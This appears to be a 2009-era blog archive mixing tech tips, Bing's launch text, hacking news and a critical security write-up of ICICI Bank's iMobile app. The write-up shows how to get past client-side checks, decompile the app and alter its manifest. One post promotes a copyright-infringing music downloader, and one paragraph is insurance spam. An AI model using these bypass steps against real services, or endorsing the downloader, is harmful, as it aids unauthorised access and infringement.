PAW - Parents are watching

PEBKAC/PEBCAK - Problem exists between keyboard and chair

Ping - From the popular network monitoring tool, used as a greeting similar to “Are you there?”.

PITA - Pain in the arse / ass

PLMK - Please let me know

PMSL - Pissing myself laughing

POS - Piece of shit, or parent over shoulder.

POTS - Plain old telephone service

POV - Point of view

PPL - People

PTKFGS - Punch the Keys For God’s Sake

pr0n - Intentional misspelling of porn

PW - Persistent World (gaming)

pwned - Intentional misspelling of owned

Q

QFT - Quoted for truth. Used on internet message boards to show agreement from a previous message

R

Rehi (or merely re) - Hello again

RL - Real Life

RO(T)FL - Rolling on (the) floor laughing

RO(T)FLMAO - Rolling on (the) floor laughing my ass off

RO(T)FLOL - Rolling on (the) floor laughing out loud

RSN - Real soon now (used sarcastically)

RTFB - Read the ~censored~ binary (or book)

RTFS - Read the ~censored~ source

RTFM/RTM - Read the (~censored~) manual

S

SCNR - Sorry, could not resist

sk8/sk8r - skate/skater

Smiley - Another name for emoticons

SMH - Shaking my head

SNAFU - Situation normal: all (~censored~/fouled) up

Snail mail - Normal paper mail service

SOHF - Sense of humor failure

Spider - The program behind a search engine

STFU - Shut the ~censored~ up

STFW - Search the ~censored~ web

T

TANSTAAFL - There ain’t no such thing as a free lunch

TBF - Time between failures

TBH - To be honest

TG - That’s great

TGIF - Thank god it’s Friday

TH(N)X, TNX or TX - Thanks

TIA - Thanks in advance

TINC - There Is No Cabal, a term discouraging conspiracy theories

TMI - Too much information

TOS - Terms of service

TTBOMK - To the best of my knowledge

TTFN - Ta ta for now

TTT - To the top, used in forums to bump a thread

TTYL - Talk to you later (also spelled TTUL, T2UL or T2YL)

TTYTT - To Tell You The Truth

Tweedler - One who has deep love for all computer related technology and gadgets

TWIMC - To Whom It May Concern

TY - Thank you

TYT - Take your time

TYVM - Thank you very much

U

U - You

UTFSE - Use the ~censored~ search engine

V

W

w00t, w00T or WOOT - First two express exuberance, the latter is a backronym for the term “We Own the Other Team”.

W/ or W/O - With or without

WB - Welcome back

W/E - Whatever

WRT - With respect / regard to

WTB - Want to buy

WTF - What the ~censored~

WTG - Way to go

WTH - What the hell

WTS - Want to sell

WTT - Want to trade

WUG - What you got?

WoW - World of Warcraft (game)

WUBU2 - What (have) you been up to?

WUU2 - What (are) you up to?

WYSIWYG - What you see is what you get

W8 - Wait

W-BB - WarezBB

Y

YARLY - Yeah Really

YHBT - You have been trolled

YKW - You know what?

YMMV - Your mileage may vary.

YTMND - You’re The Man Now, Dog

YW - You’re welcome.

YOYO - You’re On Your Own.

Z

ZOMG - An intentional misspelling of the acronym shorthand for “Oh My God/Gawd”, pronounced “Zoh My God/Gawd”. This version is mainly used in jest or to ridicule people who use abbreviations like OMG and OMFG.

Firefox Customization

Windows only: After we wrote about the All-Glass Firefox theme, reader bc//G_A wrote in with an even more impressive customization that enables the Aero Glass effect across almost every UI element.

Enabling the complete glass look requires more than a few steps—you'll need to install the Glasser extension, the Stylish extension, a number of user styles, and another extension to fix up the font colors. All of the instructions for setting up the glass theme can be found in the DeviantART guide, but the glass menus in the screenshot are thanks to the userstyles.org link sent in by reader Scott. Readers should note that the glass menus are a little buggy, and the overall style hides a lot of UI elements you might be used to, so while it's not for everybody it's an interesting customization worth a look for those serious about tweaking their browser.

You'll need to be running the latest beta of Firefox under Windows 7 or Vista to be able to use the glass menus, but you can install an older version of Glasser and use the rest of the glass effects. For more, check out All-Glass Firefox, or take a look at the more productive Aero Geek customization.

Microsoft’s new search engine that is expected to take on Google and Yahoo!

Bing is the name of Microsoft’s new search engine that is expected to go live sometime next week. You can find overview documents and screenshot images of Bing here, while a video tour of the Bing.com service is available here.





Introducing Bing

You probably didn't wake up today expecting an entirely new search experience.

But — Bing! — here it is.

So, why a new search engine? Why the new name? Why now?

Well, because even though search is a pretty amazing thing, the current state of search engines has some equally amazing statistics.

So far in 2009, there are four and a half websites created EVERY SECOND as the web continues to expand. While more searchable information is cool, nearly half of all searches don’t result in the answer that people are seeking.

At the same time, the way the world searches is changing. You want more than just information. You want knowledge that leads to action.

The truth is you've evolved. It's time search caught up.

So we had an idea. Start over. And we did.

We took a new approach to go beyond search to build what we call a decision engine. With a powerful set of intuitive tools on top of a world class search service, Bing will help you make smarter, faster decisions. We included features that deliver the best results, presented in a more organized way to simplify key tasks and help you make important decisions faster.

And features like cashback, where we actually give you money back on great products, and Price Predictor, which actually tells you when to buy an airline ticket in order to help get you the best price — help you make smarter decisions, and put money back in your pocket.

We sincerely hope that the next time you need to make an important decision, you'll Bing and decide.

Thank you,

Bing Team, Microsoft

Send Ad Free SMS with your own Name as sender

Today, I got to know about a great service which lets you send free SMS over 10 countries. You don’t need to sign up. Your SMS will arrive guaranteed and there are no annoying ads either. The message can have up to 160 characters.

Homepage: my-cool-sms.com

Cool Features:

  • Free SMS

  • No sign up required

  • Messaging to 10 countries, including India

  • Ad free messaging

  • Display your own number in the sender

  • Secured by Captcha

Hackers Temporarily Seize Control Of Google Morocco Domain Name

Google.co.ma, the domain name for Google Morocco’s search portal, was taken hostage by hackers earlier today reportedly for several hours before the problem got fixed (it’s working fine again now). We got a bunch of tips about it, and the situation lasted long enough for lots of people to take screenshots of the website the domain name briefly pointed to due to the hack.

You can find loads of screenshots here and here, but the main domain name pointed to the website shown on top of this post.

There’s a bit of confusion about how exactly the hack was performed, but it appears as if the hackers found a way into NIC.ma, which controls the DNS for the country, and targeted the Google domain name specifically. The domain was pointed to a different server, and the web page above was shown when people tried to access the search engine. Google apparently at one point automatically relayed visitors from Morocco to Google.com instead of Google.co.ma, but it took a while to get the latter functioning correctly again.

PAKbugs.com leads to a forum where Pakistani hackers hang out, and the names on top of the web page above are all members of the message board. They’re being proud of it here.

This website (in French) claims that this isn’t the first such incident this year, as apparently the websites for Google Algeria and Google Puerto Rico were taken hostage by hackers last month too.

Download Music From Last.FM

You can listen to Last.FM on your iPhone, G1 and your PC/Mac, but you can’t have mp3 files. With Last.FM Downloader you can! It’s free and has no spyware or viruses.





FYI:

Last.FM Downloader is pretty much illegal to own because you are downloading songs that are copyrighted material, but I am sure you have P2P software such as LimeWire, Strong DC++, Kazaa etc…

Use it at your own risk.

Currently this is only supported in Windows.

Thanks for the link: NirmalTV

How To Download YouTube Videos or Convert To Mp3 3gp Mp4 Etc

These few websites will provide you great tools to download YouTube videos or convert them into Mp3, Avi, 3GP or Mp4 for iPhone and iPod.

1. KeepVid - Easy to use, and they also have a toolbar for easy YouTube video download.

2. WikiHow - Few methods that will give you enough info on how to download videos to iPod

3. Vixy - Best tool out there! Allows you to convert flv files online into mp3 or any other file you can think of!!

How to Use MSN Web Messenger with Hotmail Account

MSN Web Messenger is as of today integrated with your Hotmail account. You can basically use Web MSN Messenger and talk to others while composing a new email.

To message someone, go to contacts, click on the person you would like to talk to and click on “Send an Instant Message (Available)”.

Or better yet, sign up with Gmail :)

Download and Sync YouTube Videos to iPod or iPhone

Here are some basic step by step guides that will show you how to download youtube videos to iPhone or iPod.

Best way to get FLV file from Youtube and convert for iPod or iPhone is via vixy.net. Works for Mac and Windows users.

Windows users can use AVS Video Converter that lets you convert FLV files to any file you can think of and it’s free too (see AVS4You)

Hope this short tutorial helps you get all the youtube videos you want on your iPhone or iPod Touch in our case.

How to Save Web Pages and Blogs for Offline Reading

Store Web Pages for Offline Viewing

If you have Google Desktop running in the background, you already have a local copy of all web pages that you have recently opened / read in any browser on your computer. You can click "Browse Timeline" inside Google Desktop and your web history will be listed in reverse chronological order - the most recently visited websites will be listed at the top.

The problem with web history in Google Desktop is that it can get cluttered too easily and finding relevant pages from the history may require some effort.  In that case you may install Scrapbook for Firefox and only save relevant web pages that you intend to read in an offline environment.

Scrapbook, like Google Notebook, is primarily for organizing web research but it’s an excellent offline browser as well. You can specify the depth level and all target links from the current web page (up to that level) will be saved offline automatically. For instance, say you want to read all stories on the CNN and BBC websites offline. Capture the home page with Scrapbook and set the depth as 1 - it will then save the full text of all the front page stories as well.

Scrapbook can export all the web captures as an HTML web page so you can easily read the saved content on a mobile phone or your PDA. Another popular tool for downloading web pages in Firefox is DownloadThemAll.

The limitation with either of the above tools is that they work only in Firefox and also require some manual work. What if you want to read all front page stories from all major news websites while offline? All news sites provide RSS feeds but they aren’t full text, so you have no option but to scrape content from the main website in order to read it offline.

HTTrack is free website copying software where you can create download jobs and execute them whenever you go online. For example, you can create a single download job for all news websites (like BBC, NYT, etc.), set the depth limit as 1 and get an offline version of all the front page news stories in one go. You can also save this job and re-execute it anytime later, either manually or as a scheduled task.

Another good alternative to HTTrack is wget available for Mac, Windows and Linux. You don’t have to spend time learning the complicated command line switches of wget as there are nice GUI apps available both for Mac (CocoaWget) and Windows (WinWget).

Download Blogs for Offline Reading

Blogs, or websites that offer RSS feeds, are much easier to handle and save because we know exactly what has changed since we last visited that site.

There are two categories of blog readers - (a) Addicts or people who are subscribed to several hundred feeds and want to read them all while offline and (b) Casual Readers or people who follow only a dozen or so feeds.

Casual readers can simply add their favorite feeds to Tabbloid and download them all as a PDF newsletter (example).

For people who fall in the category of addicts, the solution that will work best is a dedicated offline reader that can pre-fetch all the new articles and here are some good choices:

My first recommendation has always been FeedDemon - it’s fast, rich in features and the upcoming v2.8 is even better since it lets you export unread items as an HTML web page that can be read on any device.

If you are subscribed to feeds in Google Reader, you can try either RSS Bandit or Scoop - these are desktop based readers that work in offline mode and can synchronize with your Google Reader subscriptions. If you are on Bloglines, a similar solution for you exists in the form of GreatNews - a desktop RSS reader that is also portable. Google Gears is another solution for Google Reader users but it has limitations.

The advantage with either of the above solutions is that they all support synchronization - so if you mark an item as read in an offline environment, the change will get propagated when you go online next so there’s no double work.

Saving Blogs & Web Pages for Mobile Phones

If you plan to save web pages for offline viewing on a mobile device (with a small screen), I would recommend Web2Book - it not only downloads multiple web pages and blogs in one go but also converts them into formats like HTML or PDF that are supported on almost every mobile device.

Web pages saved with Web2Book can be easily read on ebook devices like the Microsoft Reader or the new Sony Reader. Another option for mobile devices is Plucker - it’s an offline browser available both for Windows Mobile and Palm based PDAs.

If you are an iPod owner (the old models, not the latest iPod touch), you can even turn your MP3 player into a notes reader and read web pages as plain text.

Drawloop, an online service that I mentioned in the previous Adobe PDF guide, can also join multiple web pages and save them in a single PDF file, like in this example where you have the home pages of three news websites saved in a single file.

source:labnol

Creates Auto-Starting Installer CDs for Any Applications

Windows only: Free app Install-It puts a small auto-starting application on any removable drive that makes installing applications a double-click affair.

After downloading the Install-It package, you'll want to extract its files to somewhere you can reach, like your desktop, and open up the Install.ini file in your favorite text editor. This file is simply a list of program descriptions and the locations of their installer files. If you're creating a disc full of useful installers, just replace the default examples with your chosen verbiage for each app and the location/names of the setup files. You separate those two items with a comma, using slashes where necessary, and end each line with a semi-colon.

Here's an example Install.ini I made for a supposed Windows XP re-installation:



Copy all your installer files and Install-It's files into a CD-burning app, such as CDBurnerXP, and fire away.

Now you've got a CD that, on most computers, will pop up with a list of programs that can be installed without anyone having to guess what each icon or cryptic filename means. If a computer isn't set to auto-start when it detects an autorun.inf file, though, you'll have to point the computer to install.exe—not a problem, though, if you've put each application in its own directory.

Install-It is a free download for Windows systems only.

Install-It [via The Red Ferret Journal]

How To Identify Fonts Being Used In Images

Have you ever had trouble identifying which font is being used in an image? Of course, fonts used in popular movie banners can be found easily because you have the keyword, but what if you found a free template and the font is not included? You either recreate the buttons with your own fonts replacing the original, or try posting in forums and hope that someone has seen that font before and can tell you its name. There are so many fonts, maybe hundreds of thousands, available on the internet, and identifying an unknown font is definitely NOT an easy task!

If you need to identify a font, don’t despair. I have found 2 methods that are able to help you identify an unknown font. If they are not able to help you identify the font, they will at least help you narrow it down to the closest ones.



Identifont is a free service that helps you identify a font by answering a series of simple questions about its appearance.
 
[ Identify Unknown Fonts with Identifont ]
 
Images can be color or black & white, and they don’t have to be very high quality (although that helps). Even a digital photograph of some lettering you like can be accepted. Accuracy of results is unprecedented by previous automatic systems. [ Identify Unknown Fonts with WhatTheFont ]

Finally, if the WhatTheFont system is unable to give you a good match for the font you’re looking for, you can then submit your image to the WhatTheFont Forum to have it viewed by font geeks the world over.

3 Ways a Twitter Hack

Just days after popular social networking tool Twitter was hit with a phishing scam, the company is now trying to clean up a mess surrounding a separate hacking attack.

Over the weekend, some Twitter users received scam tweets, or direct messages, to visit certain sites or blogs. The URL in the message redirected users to a bogus login page in an attempt to steal login credentials for a phishing scheme. Monday, things got worse as Twitter officials revealed several high profile accounts, such as those of Britney Spears and Barack Obama, were hacked.



"It appears someone gained access to the tools Twitter uses to control its millions of accounts," explained Graham Cluley, a senior technology consultant at security firm Sophos PLC. "Internal tools used by the tech support team were compromised. It's not clear if it was an inside job, or outside hacker. Twitter does say they think it was an individual."

The hack, according to Cluley, is much more serious than the earlier phishing attack because it was a compromise of the system that potentially exposed all Twitter users to the following dangers.



Fraudulent password use

If you gain access to someone's Twitter account, you might be able to gain access to their password, said Cluley.

"We know that 41 percent of people admit to using the same password on every web site and account that they access," he said.

Hackers who gain access to something seemingly simple, like a username and password to one account, may very well be able to use the information to gain access to more important information, such as your bank account.

Malware Infection

Twitter officials said 33 accounts had been attacked in the latest hack, including high-profile users such as Britney Spears and Barack Obama. The hackers used their temporary access to send offensive messages. CNN journalist Rick Sanchez found his account had been hacked with a message that read "i am high on crack right now might not be coming to work today."

The damage could have been much worse, said Cluley, if the hacker had decided to take a different approach.

"Imagine if instead, in the case of Britney Spears account for example, that the hacker had posted a link that said: 'Here's my new video. Click on this link.' Imagine how many people would have clicked on that and it could have pointed to malware? And Barack Obama is one of the most followed people on Twitter. If he said: 'I've just made a new speech. Check it out.' a lot of people would click on that link and get infected."



source: Network World

Hacker opens gaping holes in CSAT score security

As the investigation into the leak of college entrance exam results rolls on, prosecutors said yesterday that the computer server at the Korea Institute for Curriculum and Evaluation, which administers the exam, had been hacked over 200 times. Not only the test results but also the institute’s internal information was stolen.



According to prosecution and police sources, a manager at a public relations firm called Inuni Co. whose surname is Kim accessed the institute’s server over 200 times between August 2007 and December 2008.



A detention warrant was filed against Kim on charges of breaking information and network laws but it was rejected by the court.



Kim easily broke into the server. In August 2007, he accessed an employee’s e-mail account at the institute. Kim obtained the e-mail ID from a press release, and the password was the same as the ID.



Kim tried to log in to e-mail accounts of other institute employees over 50 times. One of his successes was with the account of someone in the institute’s administrative office. The employee used a password identical to the romanized spelling of his name.



One of the employee’s e-mails contained an attached file containing the passwords of five other employees at the institute. The employee temporarily managed the other employees’ e-mail access information because he dealt with changes in the institute’s server. Their passwords were identical to the last seven digits of their residential identification numbers.



In this way, Kim downloaded 16 types of internal information from the institute. Among the materials downloaded were plans to grade answer sheets from the 2009 College Scholastic Ability Test, scoring schedules and the number of students who missed the test.



“Kim could look at the Korea Institute for Curriculum and Evaluation’s internal information by accessing the e-mail of seven employees,” a prosecutor said.



Kim passed the information on to VisangEdu, a private education company. VisangEdu made the CSAT score analysis public on Dec. 9, a day before the CSAT results were announced.



Kim accessed the institute’s server four times on Dec. 10 after the institute requested a probe into this case.



As the investigation closed in on him, Kim destroyed a memo containing the IDs and passwords of the seven employees. Prosecutors plan to decide what kinds of charges they will file against Kim and a VisangEdu director whose surname is Jin this week.
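The three password patterns reported above (password equal to the e-mail ID, to the romanized name, and to the last seven digits of the resident ID number) can all be refused when a password is set. The following is an added example, not part of the article; the field names, thresholds and the sample account are constructed for illustration.

```python
import itertools
import re
import unicodedata

MIN_TOKEN = 4      # ignore identity fragments shorter than this
MAX_PADDING = 3    # token plus up to 3 extra characters still counts as derived


def _norm(text):
    """Lower-case, strip accents, drop everything that is not a-z or 0-9."""
    text = unicodedata.normalize("NFKD", text)
    text = "".join(ch for ch in text if not unicodedata.combining(ch))
    return re.sub(r"[^a-z0-9]", "", text.lower())


def derived_tokens(account):
    """Yield (reason, token) pairs that can be built from the account record."""
    # Pattern 1: the e-mail ID (local part), which appears in press releases.
    yield "email-id", _norm(account["email"].split("@", 1)[0])
    # Pattern 2: the romanized name, in any order of its parts.
    parts = [_norm(p) for p in account["romanized_name"].split()]
    for order in itertools.permutations(parts):
        yield "romanized-name", "".join(order)
    # Pattern 3: trailing digits of the resident ID (6 or more, so the
    # "last seven digits" case from the article is covered).
    digits = re.sub(r"\D", "", account["resident_id"])
    for length in range(6, len(digits) + 1):
        yield "resident-id-digits", digits[-length:]


def check_password(password, account):
    """Return the sorted list of reasons to reject; empty means no match."""
    pw = _norm(password)
    reasons = set()
    for reason, token in derived_tokens(account):
        if len(token) < MIN_TOKEN or token not in pw:
            continue
        # Reject when the identity token makes up nearly the whole password.
        if len(pw) - len(token) <= MAX_PADDING:
            reasons.add(reason)
    return sorted(reasons)


# Constructed sample record; none of these values come from the article.
SAMPLE_ACCOUNT = {
    "email": "kdhong@example.invalid",
    "romanized_name": "Hong Gil Dong",
    "resident_id": "900101-1234567",
}

if __name__ == "__main__":
    for candidate in ("kdhong", "GilDong.Hong1", "1234567",
                      "correct horse battery staple"):
        print(candidate, "->", check_password(candidate, SAMPLE_ACCOUNT) or "ok")
```

A check like this only covers passwords derived from the account's own record; it does not replace a breached-password list or a second factor.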

Get things Insurance

This is a world of uncertainties and no one can guess what may happen the next moment. To be frank, you should not think that this is a way of looking at things from a negative point of view. This is a step for being cautious. For instance, you might have put in a good part of your savings and bought your dream car. It is also very important to get car insurance, as it will help you get cover and get reimbursements in case some unforeseen things happen. If you are looking to get cheap car insurance then Maczoop is the perfect destination for you. The site helps you to get various quotes, compare and contrast, and then choose the best one which will fit your requirements. They have also got some valuable information and tips on auto insurance and this will be very helpful when you are going to take one. Get things insured and stay secure!

Dissecting iMobile - Security Analysis of ICICI Mobile Banking App

ICICI Bank’s iMobile website has some of the worst server side validations ever, which is what prompted me to download the mobile app’s JAR file, study it in detail and write this post. According to the website, until the Reserve Bank of India comes out with mobile banking guidelines and approves it, mobile banking is supposed to be halted. Technically, it means that all existing users shouldn’t be able to use the service whatsoever, new user signups should be prevented, and a notification stating that they should retry later should be shown.

Therefore, in this scenario, I shouldn’t have been able to download the app to my mobile device. ICICI’s website fails to enforce this and leaves the following ways open:
1. Existing users who have already installed the app are given an option to ‘Upgrade’ from within the mobile app itself. This opens up a webpage in the phone’s native browser, whose URL is http://mobile.icicibank.com/upgrade?version=null.
2. The actual iMobile website has some stupid javascript validation, which is very easy to bypass using modern browsers. Heck, just by browsing the HTML source code of the page, you will be able to easily find the URL for the application JAR files. Put 2 and 2 together and you will be able to download the app.

Which brings me to explain Step 2 in detail:
In any browser, go to View->Source. This will display the source code of the rendered HTML page. Notice the first script block. It contains many functions, and the most important to us are “submitForm” and “displayOption”. The line of interest in the submitForm method is document.jump1.action="https://infinity.icicibank.co.in/web/apps/"+fileName;. That line pretty much gives away everything. All you have to do is navigate to the above-mentioned URL and append a filename to it for download.

What filename do you have to give, and how?
That’s where our displayOption function is very useful. That function contains a set of simple If-Else conditional statements, which have the respective filenames. For example, if you want to download “M20P1520ALL1.jar”, then just append it to the URL and access it using the address bar. Therefore, the URL becomes https://infinity.icicibank.co.in/web/apps/M20P1520ALL1.jar. Being a JAR file, most browsers will display a “Save As” dialog box. Now, just download the file and transfer it to your mobile. The application is fairly straightforward.

Where ICICI Bank failed?
1. They should have disabled the link mentioned in #1 above and replaced it with some text that says, “RBI mobile banking guidelines blah blah…”. But some clever users will bookmark the link to the JAR file and try to access the JAR file by bypassing the link itself. When they do that, the web server should return a “404 - Resource Not Found” error. Got it? Implementing this is pretty simple.
2. There shouldn’t have been such a lot of useless javascript on the page. Firstly, they should have removed the device selection drop down box. Secondly, they should have replaced this page with an alternative. Thirdly, this mobile banking link should have been removed from the home page itself. Fourthly, they should have validated JAR file downloads on the server and displayed the “404 - Resource Not Found” error page.
3. OK, leave aside #1 and #2. At least the mobile app should have thrown soft errors when users try to access mobile banking from the JavaME app. Any bank would store all activity data for a certain period of time. So when you access the bank’s service from a mobile device, the server software surely knows about it, which means the server software should have returned errors to the user instead of allowing the user to do transactions.
4. There’s one more bug in the app itself. When you launch the app, it will prompt you to sync the data on the device to its servers for faster access the next time. When you click “OK” to synchronize, it will wait for a few minutes and show the message, “There is no data to synchronize”. When you proceed further and try to access your info, it will again prompt you to sync the data. That’s frustrating. Either you should sync the data properly or you should access the server every time over a secure channel. As simple as that. That’s not followed either.

For me, all these things imply only one thing: either ICICI wants the existing users to continue using the app, thereby disobeying RBI’s orders, or they have some really bad programmers who don’t know what they are doing. At a time when people fear Google tracking their internet usage, this is MY/YOUR FINANCIAL INFORMATION which is at risk. Right?
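The server-side checks asked for above (a 404 for the JAR however the URL was obtained, and an error instead of a transaction while the service is halted) come down to making the decision from server state alone. The following is an added example, not ICICI's code: the `/api/` prefix, the 503 status for suspended transactions and the placeholder artifact bytes are assumptions, while the download path and filename are the ones quoted in the post.

```python
from wsgiref.util import setup_testing_defaults

DOWNLOAD_PREFIX = "/web/apps/"   # download path quoted in the post
API_PREFIX = "/api/"             # hypothetical transaction endpoint prefix
# Constructed stand-in for the artifact store; the bytes are not a real JAR.
ARTIFACTS = {"M20P1520ALL1.jar": b"PK\x03\x04 constructed placeholder"}


class MobileBankingGate:
    """WSGI app whose answers depend only on server-side state."""

    def __init__(self, artifacts, service_enabled):
        self.artifacts = artifacts
        self.service_enabled = service_enabled

    def decide(self, path):
        """Return (status, content_type, body) for a request path."""
        not_found = ("404 Not Found", "text/plain", b"404 - Resource Not Found")
        if path.startswith(DOWNLOAD_PREFIX):
            name = path[len(DOWNLOAD_PREFIX):]
            # Exact-match lookup in an allowlist: bookmarked links, guessed
            # names and "../" segments all get the same 404 while suspended.
            if not self.service_enabled or name not in self.artifacts:
                return not_found
            return ("200 OK", "application/java-archive", self.artifacts[name])
        if path.startswith(API_PREFIX):
            # Installed copies of the app still reach the API, so the refusal
            # has to happen here, not in page script or in the client.
            if not self.service_enabled:
                return ("503 Service Unavailable", "text/plain",
                        b"Mobile banking is suspended; please retry later.")
            return ("200 OK", "text/plain", b"ok")
        return not_found

    def __call__(self, environ, start_response):
        status, ctype, body = self.decide(environ.get("PATH_INFO", ""))
        start_response(status, [("Content-Type", ctype),
                                ("Content-Length", str(len(body)))])
        return [body]


def request(app, path):
    """Drive the WSGI app in-process and return (status, body)."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path}
    setup_testing_defaults(environ)
    seen = {}

    def start_response(status, headers, exc_info=None):
        seen["status"] = status

    body = b"".join(app(environ, start_response))
    return seen["status"], body


if __name__ == "__main__":
    suspended = MobileBankingGate(ARTIFACTS, service_enabled=False)
    print(request(suspended, DOWNLOAD_PREFIX + "M20P1520ALL1.jar"))
    print(request(suspended, API_PREFIX + "balance"))
```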

That was a long post already. We still have some more to go. Let’s take a break.

Back? OK. Now, let’s dissect the actual JAR file and look into the technical details of its implementation.

The Manifest File:
Rename the .JAR extension to .ZIP and extract it to your favourite folder. Open the “META-INF” folder and open the “MANIFEST.MF” file in a text editor. As you will note, it contains lots of very valuable information, especially the socket URLs of various mobile service providers. The user agent is also very interesting. When sending HTTP requests through the application, it uses that property for setting the “user-agent” HTTP header. They also have debug strings enabled, which means that by snooping around using a good file manager for your mobile, you will be able to get technical errors, thereby letting us know how the app itself works, what requests it sends, its behaviour etc.

Another important item is, “MIDlet-Name” property in the manifest. This property determines what name the user sees after he installs the app on his mobile. Using the same name, when future upgrades are made available, the app is just replaced in place of the old one, which means, if you modify the “MIDlet-Name” property and install the app again, you will have 2 copies of the same app. THIS SHOULD NEVER BE ALLOWED FOR A HIGHLY CRITICAL FINANCIAL APPLICATION. Isn’t it? As an example, try changing the MIDlet-Name of the Yahoo! Go JAR file and try to install the app again on your mobile. My E51 shows an “Invalid JAR” error message because of MD5 sum checks etc.

Some more Holes:
Now, move back to the folder where the JAR file has been extracted. It contains a bunch of .class files. Pass them through a decompiler. You will get “perfect” Java source code files. The code looks obfuscated, but it’s not obfuscated enough. Anybody will be able to make good sense of the source code. All the URLs, all the strings used and everything else will be clearly visible. By using the app on your mobile side-by-side, you will easily be able to follow the source code. All in all, I wouldn’t use this app anymore until the security measures are tighter.

What should the bank do here?
It shouldn’t allow the installation of 2 apps from the same JAR with different names. Take the example of the Yahoo! Go JAR file.
I guess these mobile providers’ socket URLs are used on a one-time basis to send a verification SMS. If that is the case, they shouldn’t be present in the manifest file, for a variety of reasons that I won’t discuss here.
There’s an interesting property named “WSCDomainName” in the manifest file. I guess it expands to “Web Service Client Domain Name”, though I’m not sure about it. Suggestion: encrypt the name-value pairs.
Most importantly, sign the application using the Java Signed program. C’mon, users are doing financial transactions, and a signed app will increase their confidence in using this application.

Suggestion for Users:
Users should install these kinds of apps on their mobile’s inbuilt memory instead of the memory card. The reason is that when you connect your phone to the PC in thumb drive mode, all the RMS file stores for the mobile app are clearly visible. There are many decoders available on the internet that can read content from the RMS file stores. When you store this app on your mobile’s inbuilt memory, you can’t read those stores directly, and there are a number of checks in place that prevent reading them.

That’s about it!

Of course, this blog post can’t be termed a full-fledged security analysis. But most of what the bank has ignored is mere basics. They must have more secure systems in place.

How to open mobile websites on your PC browser

There are a number of use-cases for which you would want to browse a mobile-optimized website on your PC. When you visit the mobile website in your PC’s web browser, the website displays the full content, much to your dismay. However, when you visit the same website from a mobile browser, it displays a perfectly mobile-optimized page.


In these cases, there are some simple steps that you can follow to open mobile websites on your PC:



  1. Download and install the latest version of Firefox from http://www.getfirefox.com/.

  2. Visit Firefox Add-ons page and download the Modify Headers addon.

  3. Install the addon and restart Firefox.

  4. From the Firefox window, select the “Tools” menu and click on the “Modify Headers” option (Tools -> Modify Headers).

  5. The window will open as shown:

    [Screenshot: Modify Headers addon window]

  6. Below the title bar, there’s a drop down. Select “Add” from the drop down box.

  7. Now in the text box next to the drop down, type “user-agent”.

  8. In the third text box, paste this string - Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE51-1/100.34.20; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413.

  9. Click on “Save”.

  10. The screen should look as shown in the screenshot below:

    [Screenshot: filled screen of the addon]

  11. Using the buttons on the Modify Headers addon window, you can enable or disable particular items.

  12. That’s it! Whenever you want to view a mobile website, just go to Tools->Modify Headers and enable the user agent you added in step 8. When you don’t need it, just open this window and disable it.

  13. You can close addon window after you have enabled/disabled items.

  14. Enjoy! :)
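
What the Modify Headers steps above do, reproduced as an added example that is not part of the original post: a constructed local test server picks its layout from the User-Agent header, and the same client receives either page depending on the string it sends. The server, its responses and the desktop User-Agent are assumptions; the mobile string is the one from step 8.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

NOKIA_E51_UA = ("Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE51-1/100.34.20; "
                "Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 "
                "(KHTML, like Gecko) Safari/413")
DESKTOP_UA = "Mozilla/5.0 (Windows NT 10.0; rv:115.0) Gecko/20100101 Firefox/115.0"

class SniffingSite(BaseHTTPRequestHandler):
    """Constructed stand-in for a site that picks a layout from User-Agent."""
    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        body = b"mobile page" if "SymbianOS" in ua else b"full desktop page"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo output quiet
        pass

def fetch(url, user_agent):
    """GET url with a caller-chosen User-Agent, bypassing any system proxy."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with opener.open(req, timeout=5) as resp:
        return resp.read().decode()

def demo():
    """Start the local server, request it with both strings, return both bodies."""
    server = HTTPServer(("127.0.0.1", 0), SniffingSite)  # port 0 = any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    url = f"http://127.0.0.1:{server.server_port}/"
    try:
        return fetch(url, DESKTOP_UA), fetch(url, NOKIA_E51_UA)
    finally:
        server.shutdown()
        server.server_close()

if __name__ == "__main__":
    print(demo())
```

Because the header is entirely client-supplied, a server should use it only for presentation choices, never as evidence of which device or app is connecting.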